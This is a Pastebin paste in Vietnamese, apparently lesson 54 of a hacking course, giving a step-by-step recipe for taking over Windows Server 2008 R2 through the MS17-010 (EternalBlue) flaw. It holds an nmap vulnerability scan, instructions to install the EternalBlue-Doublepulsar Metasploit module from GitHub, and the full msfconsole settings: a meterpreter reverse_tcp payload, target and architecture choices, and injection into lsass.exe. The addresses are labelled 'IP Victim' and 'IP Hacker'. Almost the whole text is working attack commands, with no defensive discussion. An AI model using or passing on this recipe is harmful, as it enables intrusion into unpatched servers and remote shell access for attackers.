Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bài 54: Tấn công chiếm quyền Windows Server 2008 R2 x64 (Khai thác ms17_010)
- Command scan lỗ hổng với nmap : nmap -T4 -A -v --script smb-vuln-ms17-010 192.168.1.7
- Tiến hành cài đặt moudle khai thác vào Metasploit
- apt-get update
- apt-get install wine32
- git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
- copy thư mục deps và file eternal.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
- msfconsole
- search eternalblue
- use exploit/windows/smb/eternalblue_doublepulsar
- set PAYLOAD windows/meterpreter/reverse_tcp (nếu HĐH 64bit thì: windows/x64/meterpreter/reverse_tcp)
- set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
- set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
- show targets
- set target 9
- set targset WINEPATH /root/
- set TARGETARCHITECTURE x86 ( nếu HĐH 64 thì thay x86=x64)
- set RHOST IP Victim
- set LHOST IP Hacker
- set PROCESSINJECT lsass.exe (Nếu máy Victim là HĐH 64bit-Phần lớn các Windows Server là 64 bit)
- exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement